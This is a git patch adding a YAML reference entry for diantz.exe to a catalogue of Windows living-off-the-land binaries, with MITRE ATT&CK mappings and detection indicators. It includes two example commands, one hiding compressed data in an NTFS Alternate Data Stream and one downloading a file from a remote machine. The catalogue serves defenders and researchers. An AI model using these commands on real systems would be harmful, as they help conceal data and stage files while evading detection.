From 4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834 Mon Sep 17 00:00:00 2001
From: Tamirye <34610125+Tamirye@users.noreply.github.com>
Date: Sat, 8 Aug 2020 15:09:53 +0300
Subject: [PATCH] Create diantz.yml

use daintz.exe to download and compress a binary file from a remote server\internet or use it to store file in Alternate data stream.
---
 yml/OSBinaries/diantz.yml | 39 +++++++++++++++++++++++++++++++++++++++
 1 file changed, 39 insertions(+)
 create mode 100644 yml/OSBinaries/diantz.yml

diff --git a/yml/OSBinaries/diantz.yml b/yml/OSBinaries/diantz.yml
new file mode 100644
index 0000000..a79ecc3
--- /dev/null
+++ b/yml/OSBinaries/diantz.yml
@@ -0,0 +1,39 @@
+
+---
+Name: diantz.exe
+Description: Binary that package existing files into a cabinet (.cab) file
+Author: Tamir Yehuda
+Created: 08/08/2020
+Commands:
+  - Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
+    Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
+    Usecase: Hide data compressed into an Alternate Data Stream. 
+    Category: ADS
+    Privileges: User
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
+  - Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
+    Description: Download and compress a remote file and store it in a cab file on local machine.
+    Usecase: Download and compress into a cab file. 
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+    OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
+Full_Path:
+  - Path: c:\windows\system32\diantz.exe
+  - Path: c:\windows\syswow64\diantz.exe
+Code_Sample: 
+  - Code: 
+Detection: 
+  - IOC: diantz storing data into alternate data streams.
+  - IOC: diantz getting a file from a remote machine or the internet.
+Resources:
+  - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz
+Acknowledgement:
+  - Person: Tamir Yehuda
+    Handle: @tim8288
+  - Person: Hai Vaknin
+    Handle: @vakninhai
+---